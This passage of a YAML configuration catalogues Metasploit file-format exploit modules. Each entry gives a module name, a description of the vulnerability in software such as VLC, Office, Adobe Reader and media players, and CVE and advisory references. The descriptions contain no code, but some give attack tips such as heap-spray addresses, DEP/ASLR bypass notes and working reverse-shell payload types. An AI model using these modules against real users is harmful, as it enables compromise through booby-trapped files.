\t\t\t\t\tThis module exploits a stack-based buffer overflow in David Manthey's\n\
\t\t\t\tOrbital Viewer. When processing .ORB files, data is read from file into\n\
\t\t\t\ta fixed-size stack buffer using the fscanf function. Since no bounds\n\
\t\t\t\tchecking is done, a buffer overflow can occur. Attackers can execute\n\
\t\t\t\tarbitrary code by convincing their victim to open an ORB file.\n\
\t\t\t"
authors:
- - BID
- "38436"
- - OSVDB
- "62580"
- - CVE
- 2010-0688
- - URL
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/
- - URL
- http://www.exploit-db.com/exploits/11581
path: extensions/metasploit/
class: Msf_module
msf_ms10_004_textbytesatom:
enable: true
msf: true
msf_key: windows/fileformat/ms10_004_textbytesatom
name: Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in the handling of\n\
\t\t\t\tthe TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n\
\t\t\t\tthe PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n\
\t\t\t\tOffice 2004 for Mac, are vulnerable.\n\n\
\t\t\t\tNOTE: The vulnerable code path is not reachable on versions of Windows prior to\n\
\t\t\t\tWindows Vista.\n\
\t\t\t"
authors:
- - CVE
- 2010-0033
- - OSVDB
- "62241"
- - MSB
- MS10-004
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-017/
- - URL
- http://www.snoop-security.com/blog/index.php/2010/03/exploiting-ms10-004-ppt-viewer/
path: extensions/metasploit/
class: Msf_module
msf_videolan_tivo:
enable: true
msf: true
msf_key: windows/fileformat/videolan_tivo
name: VideoLAN VLC TiVo Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n\
\t\t\t\tBy creating a malicious TY file, a remote attacker could overflow a\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-4654
- - OSVDB
- "49181"
- - BID
- "31813"
path: extensions/metasploit/
class: Msf_module
msf_visio_dxf_bof:
enable: true
msf: true
msf_key: windows/fileformat/visio_dxf_bof
name: Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based overflow vulnerability in the handling\n\
\t\t\t\tof the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n\
\t\t\t\tthe MS bulletin MS10-028 are vulnerable. The overflow occurs when the application\n\
\t\t\t\tis used to import a specially crafted DXF file, while parsing the HEADER section\n\
\t\t\t\tof the DXF file.\n\n\
\t\t\t\tTo trigger the vulnerability, an attacker must convince someone to insert a\n\
\t\t\t\tspecially crafted DXF file into a new document via 'Insert' -> 'CAD Drawing'.\n\
\t\t\t\t"
authors:
- - CVE
- 2010-1681
- - OSVDB
- "64446"
- - BID
- "39836"
- - URL
- http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow
- - URL
- http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/
path: extensions/metasploit/
class: Msf_module
msf_audiotran_pls:
enable: true
msf: true
msf_key: windows/fileformat/audiotran_pls
name: Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n\
\t\t\t\tAn attacker must send the file to the victim and the victim must open the file.\n\
\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\tPLS file within a browser, when the PLS extension is registered to Audiotran.\n\
\t\t\t\tThis functionality has not been tested in this module.\n\
\t\t\t"
authors:
- - CVE
- 2009-0476
- - OSVDB
- "55424"
- - URL
- http://www.exploit-db.com/exploits/11079
path: extensions/metasploit/
class: Msf_module
msf_moxa_mediadbplayback:
enable: true
msf: true
msf_key: windows/fileformat/moxa_mediadbplayback
name: MOXA MediaDBPlayback ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When\n\
\t\t\t\tsending an overly long string to the PlayFileName() method of MediaDBPlayback.DLL (2.2.0.5)\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68986"
- - URL
- http://www.moxa.com
path: extensions/metasploit/
class: Msf_module
msf_ultraiso_cue:
enable: true
msf: true
msf_key: windows/fileformat/ultraiso_cue
name: UltraISO CUE File Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\n\
\t\t\t\tUltraISO. When processing .CUE files, data is read from file into a\n\
\t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n\
\t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\n\
\t\t\t\tto open a CUE file.\n\n\
\t\t\t\tNOTE: A file with the same base name, but the extension of \"bin\" must also\n\
\t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\n\
\t\t\t\tboth exist.\n\
\t\t\t"
authors:
- - CVE
- 2007-2888
- - OSVDB
- "36570"
- - BID
- "24140"
- - URL
- http://www.exploit-db.com/exploits/3978
path: extensions/metasploit/
class: Msf_module
msf_activepdf_webgrabber:
enable: true
msf: true
msf_key: windows/fileformat/activepdf_webgrabber
name: activePDF WebGrabber ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n\
\t\t\t\tsending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This control is not marked safe\n\
\t\t\t\tfor scripting, so choose your attack vector accordingly.\n\n\
\t\t\t"
authors:
- - OSVDB
- "64579"
- - URL
- http://www.activepdf.com/products/serverproducts/webgrabber/
path: extensions/metasploit/
class: Msf_module
msf_nuance_pdf_launch_overflow:
enable: true
msf: true
msf_key: windows/fileformat/nuance_pdf_launch_overflow
name: Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n\
\t\t\t\t\ttriggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record.\n\
\t\t\t\t\tThis exploit does not use javascript.\n\
\t\t\t"
authors:
- - OSVDB
- "68514"
- - URL
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/
path: extensions/metasploit/
class: Msf_module
msf_lotusnotes_lzh:
enable: true
msf: true
msf_key: windows/lotus/lotusnotes_lzh
name: Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n\
\t\t\t\tparsing a malformed, specially crafted LZH file. This vulnerability was\n\
\t\t\t\tdiscovered by binaryhouse.net.\n\n\
\t\t\t"
authors:
- - CVE
- 2011-1213
- - OSVDB
- "72706"
- - BID
- "48018"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904
- - URL
- http://www.ibm.com/support/docview.wss?uid=swg21500034
path: extensions/metasploit/
class: Msf_module
msf_vuplayer_cue:
enable: true
msf: true
msf_key: windows/fileformat/vuplayer_cue
name: VUPlayer CUE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack overflow in VUPlayer <= 2.49. When\n\
\t\t\t\tthe application is used to open a specially crafted cue file, a buffer is overflowed, allowing\n\
\t\t\t\tfor the execution of arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "64581"
- - BID
- "33960"
path: extensions/metasploit/
class: Msf_module
msf_mcafee_hercules_deletesnapshot:
enable: true
msf: true
msf_key: windows/fileformat/mcafee_hercules_deletesnapshot
name: McAfee Remediation Client ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When\n\
\t\t\t\tsending an overly long string to the DeleteSnapshot() method\n\
\t\t\t\tof enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n\
\t\t\t\tThis control is not marked safe for scripting, so choose your attack vector accordingly.\n\
\t\t\t"
authors:
- - URL
- http://www.metasploit.com
path: extensions/metasploit/
class: Msf_module
msf_vlc_smb_uri:
enable: true
msf: true
msf_key: windows/fileformat/vlc_smb_uri
name: VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Win32AddConnection\n\
\t\t\t\tfunction of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are\n\
\t\t\t\treportedly affected.\n\n\
\t\t\t\tThis vulnerability is only present in Win32 builds of VLC.\n\n\
\t\t\t\tThis module was found to work with the windows/exec and\n\
\t\t\t\twindows/meterpreter/reverse_tcp payloads. However, the\n\
\t\t\t\twindows/meterpreter/reverse_ord_tcp payload was found not to work.\n\
\t\t\t"
authors:
- - BID
- "35500"
- - OSVDB
- "55509"
- - CVE
- 2009-2484
- - URL
- http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f
- - URL
- http://milw0rm.com/exploits/9209
- - URL
- http://www.exploit-db.com/exploits/9029
path: extensions/metasploit/
class: Msf_module
msf_foxit_reader_filewrite:
enable: true
msf: true
msf_key: windows/fileformat/foxit_reader_filewrite
name: Foxit PDF Reader 4.2 Javascript File Write
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n\
\t\t\t\t\tversion 4.2. The createDataObject() Javascript API function allows for writing\n\
\t\t\t\t\tarbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\
\t\t\t\t\t\n\
\t\t\t\t\tNote: This exploit currently uses the All Users directory, which requires\n\
\t\t\t\t\tadministrator privileges to write to. This means an administrative user has to\n\
\t\t\t\t\topen the file for the exploit to be successful. Kind of lame, but that's how it goes sometimes in\n\
\t\t\t\t\tthe world of file write bugs.\n\
\t\t\t"
authors:
- - OSVDB
- "71104"
- - URL
- http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html
path: extensions/metasploit/
class: Msf_module
msf_hhw_hhp_indexfile_bof:
enable: true
msf: true
msf_key: windows/fileformat/hhw_hhp_indexfile_bof
name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74.\n\
\t\t\t\t\tBy creating a specially crafted hhp file, an attacker may be able\n\
\t\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0133
- - BID
- "33189"
- - OSVDB
- "22941"
- - URL
- http://www.exploit-db.com/exploits/10323
- - URL
- http://www.exploit-db.com/exploits/10335
path: extensions/metasploit/
class: Msf_module
msf_msworks_wkspictureinterface:
enable: true
msf: true
msf_key: windows/fileformat/msworks_wkspictureinterface
name: Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThe Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n\
\t\t\t\tto execute arbitrary code on a system. By passing a negative integer to the\n\
\t\t\t\tWksPictureInterface method, an attacker could execute arbitrary code on the system\n\
\t\t\t\twith the privileges of the victim. For IE6, change 168430090 (0x0A0A0A0A) to 202116108 (0x0C0C0C0C).\n\
\t\t\t\tThis control is not marked safe for scripting, so choose your attack vector carefully.\n\
\t\t\t"
authors:
- - CVE
- 2008-1898
- - OSVDB
- "44458"
path: extensions/metasploit/
class: Msf_module
msf_vlc_modplug_s3m:
enable: true
msf: true
msf_key: windows/fileformat/vlc_modplug_s3m
name: VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an input validation error in libmod_plugin as\n\
\t\t\t\tincluded with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n\
\t\t\t\tare affected. By creating a malicious S3M file, a remote attacker\n\
\t\t\t\tcould execute arbitrary code.\n\n\
\t\t\t\tAlthough other products that bundle libmodplug may be vulnerable, this\n\
\t\t\t\tmodule was only tested against VLC.\n\n\
\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n\
\t\t\t\tpermanently enable NX support on machines that support it. As such,\n\
\t\t\t\tthis module is capable of bypassing DEP, but not ASLR.\n\
\t\t\t"
authors:
- - CVE
- 2011-1574
- - OSVDB
- "72143"
- - URL
- http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b
- - URL
- http://hackipedia.org/File%20formats/Music/html/s3mformat.php
- - URL
- https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt
- - URL
- http://seclists.org/fulldisclosure/2011/Apr/113
path: extensions/metasploit/
class: Msf_module
msf_aol_desktop_linktag:
enable: true
msf: true
msf_key: windows/fileformat/aol_desktop_linktag
name: AOL Desktop 9.6 RTX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n\
\t\t\t\tcomponent. By supplying a long string of data in the hyperlink tag, rich.rct copies\n\
\t\t\t\tthis data into a buffer using a strcpy function, which causes an overflow and\n\
\t\t\t\tresults in arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "70741"
- - URL
- http://www.exploit-db.com/exploits/16085/
path: extensions/metasploit/
class: Msf_module
msf_ms10_087_rtf_pfragments_bof:
enable: true
msf: true
msf_key: windows/fileformat/ms10_087_rtf_pfragments_bof
name: Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of the\n\
\t\t\t\t'pFragments' shape property within the Microsoft Word RTF parser. All versions\n\
\t\t\t\tof Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n\
\t\t\t\tMS10-087 bulletin are vulnerable.\n\n\
\t\t\t\tThis module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n\
\t\t\t\tThe Microsoft Word RTF parser was only used by default in versions of Microsoft\n\
\t\t\t\tWord itself prior to Office 2007. With the release of Office 2007, Microsoft\n\
\t\t\t\tbegan using the Word RTF parser, by default, to handle rich-text messages within\n\
\t\t\t\tOutlook as well. It was possible to configure Outlook 2003 and earlier to use\n\
\t\t\t\tthe Microsoft Word engine too, but it was not a default setting.\n\n\
\t\t\t\tIt appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n\
\t\t\t\tMicrosoft will confirm or deny this since Office 2000 has reached its support\n\
\t\t\t\tcycle end-of-life.\n\
\t\t\t"
authors:
- - CVE
- 2010-3333
- - OSVDB
- "69085"
- - MSB
- MS10-087
- - BID
- "44652"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880
path: extensions/metasploit/
class: Msf_module
msf_hhw_hhp_compiledfile_bof:
enable: true
msf: true
msf_key: windows/fileformat/hhw_hhp_compiledfile_bof
name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74.\n\
\t\t\t\tBy creating a specially crafted hhp file, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-0564
- - OSVDB
- "22941"
- - URL
- http://www.exploit-db.com/exploits/1488
- - URL
- http://www.exploit-db.com/exploits/1490
path: extensions/metasploit/
class: Msf_module
msf_feeddemon_opml:
enable: true
msf: true
msf_key: windows/fileformat/feeddemon_opml
name: FeedDemon <= 3.1.0.12 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n\
\t\t\t\tis used to import a specially crafted opml file, a buffer overflow occurs allowing\n\
\t\t\t\tarbitrary code execution.\n\n\
\t\t\t\tAll versions are suspected to be vulnerable. This vulnerability was originally reported\n\
\t\t\t\tagainst version 2.7 in February of 2009.\n\
\t\t\t"
authors:
- - CVE
- 2009-0546
- - OSVDB
- "51753"
- - BID
- "33630"
- - URL
- http://www.exploit-db.com/exploits/7995
- - URL
- http://www.exploit-db.com/exploits/8010
- - URL
- http://www.exploit-db.com/exploits/11379
path: extensions/metasploit/
class: Msf_module
msf_ms11_006_createsizeddibsection:
enable: true
msf: true
msf_key: windows/fileformat/ms11_006_createsizeddibsection
name: Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of thumbnails\n\
\t\t\t\twithin .MIC files and various Office documents. When processing a thumbnail bitmap\n\
\t\t\t\tcontaining a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n\
\t\t\t\tleads to arbitrary code execution.\n\n\
\t\t\t\tIn order to trigger the vulnerable code, the folder containing the document must be\n\
\t\t\t\tviewed using the \"Thumbnails\" view.\n\
\t\t\t"
authors:
- - CVE
- 2010-3970
- - OSVDB
- "70263"
- - MSB
- MS11-006
- - BID
- "45662"
- - URL
- http://www.microsoft.com/technet/security/advisory/2490606.mspx
- - URL
- http://www.powerofcommunity.net/schedule.html
path: extensions/metasploit/
class: Msf_module
msf_visiwave_vwr_type:
enable: true
msf: true
msf_key: windows/fileformat/visiwave_vwr_type
name: VisiWave VWR File Parsing Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability found in VisiWave's Site Survey Report application.\n\
\t\t\t\tWhen processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n\
\t\t\t\tproperty (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n\
\t\t\t\t'Image'), but if a match isn't found, the function that's supposed to handle this routine\n\
\t\t\t\tends up returning the input as a pointer, which is later used in a CALL DWORD PTR [EDX+10]\n\
\t\t\t\tinstruction. This allows attackers to overwrite it with any arbitrary value, and results in code\n\
\t\t\t\texecution. A patch is available at visiwave.com; the fix zeroes the return value (via XOR)\n\
\t\t\t\tif no match is found, and the value is then validated before use.\n\n\
\t\t\t\tNOTE: During installation, the application registers two file handlers, VWS and VWR, which allow a\n\
\t\t\t\tvictim user to 'double click' the malicious VWR file and execute code. This module was also built\n\
\t\t\t\tto bypass ASLR and DEP.\n\
\t\t\t"
authors:
- - CVE
- 2011-2386
- - OSVDB
- "72464"
- - URL
- http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html
- - URL
- http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20
path: extensions/metasploit/
class: Msf_module
msf_mediajukebox:
enable: true
msf: true
msf_key: windows/fileformat/mediajukebox
name: Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Media Jukebox 8.0.400\n\
\t\t\t\tBy creating a specially crafted m3u or pls file, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "55924"
- - CVE
- 2009-2650
path: extensions/metasploit/
class: Msf_module
msf_microp_mppl:
enable: true
msf: true
msf_key: windows/fileformat/microp_mppl
name: MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
category: Metasploit
description: " \n\
\t\t\t\t\tThis module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n\
\t\t\t\tbuffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n\
\t\t\t\twhich overwrites the lpFileName parameter of a CreateFileA() function, and results\n\
\t\t\t\tin arbitrary code execution under the context of the user.\n\
\t\t\t"
authors:
- - OSVDB
- "73627"
- - URL
- http://www.exploit-db.com/exploits/14720
path: extensions/metasploit/
class: Msf_module
msf_sascam_get:
enable: true
msf: true
msf_key: windows/fileformat/sascam_get
name: SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThe SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n\
\t\t\t\tBy passing an overly long argument via the Get method, a remote attacker could\n\
\t\t\t\toverflow a buffer and execute arbitrary code on the system with the privileges\n\
\t\t\t\tof the user. This control is not marked safe for scripting, please choose your\n\
\t\t\t\tattack vector carefully.\n\
\t\t\t\t"
authors:
- - CVE
- 2008-6898
- - OSVDB
- "55945"
- - BID
- "33053"
path: extensions/metasploit/
class: Msf_module
msf_fatplayer_wav:
enable: true
msf: true
msf_key: windows/fileformat/fatplayer_wav
name: Fat Player Media Player 0.6b0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Fat Player 0.6b. When\n\
\t\t\t\tthe application is used to import a specially crafted wav file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "57343"
- - URL
- https://www.exploit-db.com/exploits/15279/
path: extensions/metasploit/
class: Msf_module
msf_mjm_coreplayer2011_s3m:
enable: true
msf: true
msf_key: windows/fileformat/mjm_coreplayer2011_s3m
name: MJM Core Player 2011 .s3m Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in MJM Core Player 2011.\n\
\t\t\t\tWhen opening a malicious s3m file in this application, a stack buffer overflow can be\n\
\t\t\t\ttriggered, resulting in arbitrary code execution.\n\
\t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.\n\
\t\t\t"
authors:
- - OSVDB
- "72101"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-004
path: extensions/metasploit/
class: Msf_module
msf_wm_downloader_m3u:
enable: true
msf: true
msf_key: windows/fileformat/wm_downloader_m3u
name: WM Downloader 3.1.2.2 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n\
\t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "66911"
- - URL
- http://www.exploit-db.com/exploits/14497/
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_button:
enable: true
msf: true
msf_key: windows/fileformat/adobe_flashplayer_button
name: Adobe Flash Player "Button" Remote Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the handling of certain SWF movies\n\
\t\t\t\twithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n\
\t\t\t\tare also vulnerable, as are any other applications that may embed Flash player.\n\n\
\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\n\
\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\n\
\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\n\n\
\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\n\
\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\n\
\t\t\t\tWindows versions due to the hardcoded syscall number.\n\
\t\t\t"
authors:
- - CVE
- 2010-3654
- - OSVDB
- "68932"
- - BID
- "44504"
- - URL
- http://www.adobe.com/support/security/advisories/apsa10-05.html
- - URL
- http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/
- - URL
- http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/
path: extensions/metasploit/
class: Msf_module
msf_deepburner_path:
enable: true
msf: true
msf_key: windows/fileformat/deepburner_path
name: AstonSoft DeepBurner (DBR File) Path Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in versions 1.9.0.228,\n\
\t\t\t\t1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n\
\t\t\t\tAn attacker must send the file to the victim and the victim must open the file.\n\
\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\tDBR file within a browser, since the DBR extension is registered to DeepBurner.\n\
\t\t\t"
authors:
- - BID
- "21657"
- - OSVDB
- "32356"
- - CVE
- 2006-6665
- - URL
- http://milw0rm.com/exploits/2950
- - URL
- http://milw0rm.com/exploits/8335
- - URL
- http://www.exploit-db.com/exploits/11315
path: extensions/metasploit/
class: Msf_module
msf_acdsee_xpm:
enable: true
msf: true
msf_key: windows/fileformat/acdsee_xpm
name: ACDSee XPM File Section Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in ACDSee 9.0.\n\
\t\t\t\tWhen viewing a malicious XPM file with the ACDSee product,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2193
- - OSVDB
- "35236"
- - BID
- "23620"
path: extensions/metasploit/
class: Msf_module
msf_bacnet_csv:
enable: true
msf: true
msf_key: windows/fileformat/bacnet_csv
name: BACnet OPC Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SCADA\n\
\t\t\t\tEngine BACnet OPC Client v1.0.24. When the BACnet OPC Client\n\
\t\t\t\tparses a specially crafted csv file, arbitrary code may be\n\
\t\t\t\texecuted.\n\
\t\t\t"
authors:
- - OSVDB
- "68096"
- - BID
- "43289"
- - URL
- http://www.us-cert.gov/control_systems/pdf/ICSA-10-264-01.pdf
path: extensions/metasploit/
class: Msf_module
msf_cain_abel_4918_rdp:
enable: true
msf: true
msf_key: windows/fileformat/cain_abel_4918_rdp
name: Cain & Abel <= v4.9.24 RDP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Cain & Abel v4.9.24\n\
\t\t\t\tand below. An attacker must send the file to the victim, and the victim must open\n\
\t\t\t\tthe specially crafted RDP file under Tools -> Remote Desktop Password Decoder.\n\
\t\t\t"
authors:
- - CVE
- 2008-5405
- - OSVDB
- "50342"
- - URL
- http://www.milw0rm.com/exploits/7329
- - BID
- "32543"
path: extensions/metasploit/
class: Msf_module
msf_subtitle_processor_m3u_bof:
enable: true
msf: true
msf_key: windows/fileformat/subtitle_processor_m3u_bof
name: Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in Subtitle Processor 7. By\n\
\t\t\t\tsupplying a long string of data as a .m3u file, Subtitle Processor first converts\n\
\t\t\t\tthis input to Unicode, which expands the string size, and then attempts to copy it\n\
\t\t\t\tinline on the stack. This results in a buffer overflow with SEH overwritten, allowing\n\
\t\t\t\tarbitrary code execution.\n\
\t\t\t"
authors:
- - URL
- http://sourceforge.net/projects/subtitleproc/
- - URL
- http://www.exploit-db.com/exploits/17217/
path: extensions/metasploit/
class: Msf_module
msf_mymp3player_m3u:
enable: true
msf: true
msf_key: windows/fileformat/mymp3player_m3u
name: Steinberg MyMP3Player 3.0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Steinberg MyMP3Player 3.0. When\n\
\t\t\t\tthe application is used to open a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "64580"
- - URL
- http://www.exploit-db.com/exploits/11791
path: extensions/metasploit/
class: Msf_module
msf_adobe_collectemailinfo:
enable: true
msf: true
msf_key: windows/fileformat/adobe_collectemailinfo
name: Adobe Collab.collectEmailInfo() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n\
\t\t\t\t\tBy creating a specially crafted pdf that contains a malformed Collab.collectEmailInfo() call,\n\
\t\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5659
- - OSVDB
- "41495"
path: extensions/metasploit/
class: Msf_module
msf_ideal_migration_ipj:
enable: true
msf: true
msf_key: windows/fileformat/ideal_migration_ipj
name: PointDev IDEAL Migration Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in versions v9.7\n\
\t\t\t\tthrough v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n\
\t\t\t\tIDEAL Migration. All versions are suspected to be vulnerable.\n\
\t\t\t\tBy creating a specially crafted ipj file, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\n\
\t\t\t\tNOTE: IDEAL Administration 10.5 is compiled with /SafeSEH\n\
\t\t\t"
authors:
- - CVE
- 2009-4265
- - OSVDB
- "60681"
- - URL
- http://www.exploit-db.com/exploits/10319
- - URL
- http://www.exploit-db.com/exploits/12403
- - URL
- http://www.exploit-db.com/exploits/12404
- - URL
- http://www.exploit-db.com/exploits/12540
path: extensions/metasploit/
class: Msf_module
msf_djvu_imageurl:
enable: true
msf: true
msf_key: windows/fileformat/djvu_imageurl
name: DjVu DjVu_ActiveX_MSOffice.dll ActiveX Component Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an\n\
\t\t\t\toverly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This control is not marked safe\n\
